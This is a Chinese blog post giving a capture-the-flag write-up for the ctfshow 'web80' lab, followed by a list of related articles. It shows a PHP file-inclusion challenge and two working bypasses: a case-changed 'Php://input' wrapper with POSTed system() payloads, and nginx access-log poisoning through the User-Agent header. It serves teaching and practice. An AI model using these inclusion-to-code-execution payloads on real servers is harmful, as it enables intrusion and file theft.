当前位置: 首页 > backend >正文

[ctfshow web入门] web80

backend 2025/7/18 19:51:07

信息收集

过滤了phpdata

if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

在这里插入图片描述

日志绕过

?file=/var/log/nginx/access.log

user-agent里写上

<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

在这里插入图片描述

web79    目录    web81

http://www.xdnf.cn/news/10179.html

相关文章:

  • 2.测试项目启动和研读需求文档
  • js 动画库、2048核心逻辑、面试题add[1][2][3]+4
  • Datatable和实体集合互转
  • 华锐视点助力,虚拟旅游绽放更璀璨光彩​
  • 图书管理系统的设计与实现
  • 北京大学肖臻老师《区块链技术与应用》公开课:06-BTC-网络
  • canoe 排查配置相关【graphics,capl】
  • Python基本运算符
  • python装饰器
  • DSP处理数字信号做什么用的?
  • Unsafe.putOrderedInt与Volatile
  • 驱动灯珠芯片LT3743手册理解
  • phpmyadmin
  • RTOS:启动调度器的作用(含源码逐行解读)
  • 微信小店推客系统达人用户管理的数据支持和便利
  • 【仿生机器人】Alice计划——仿生机器人需求
  • ABB HIEE300690R0001 AR C093 AE01 励磁调节器 PCB板特价
  • 第六十一节:深度学习-使用 OpenCV DNN 模块
  • 江科大SPI串行外设接口hal库实现
  • Linux 1.0.4
  • [硬件选型篇] 一文解决常用5V转3.3V电路选型困难(包括各选型的优缺点、纹波、效率等)
  • DAY 15 复习日
  • SpringBoot整合Flowable【08】- 前后端如何交互
  • jq处理日志数据
  • 局域网/内网IP地址配置HTTPS证书全流程指南
  • TypeScript 中高级类型 keyof 与 typeof的场景剖析。
  • [STM32问题解决(2)]STM32通过串口与PC通信,打开串口助手后无法在打开状态下下载程序和复位STM32
  • 抢占先机!品牌如何利用软文营销领跑内容营销赛道?
  • 【笔记】Windows 系统安装 Supabase CLI 完整指南(基于 Scoop)
  • 未来技术展望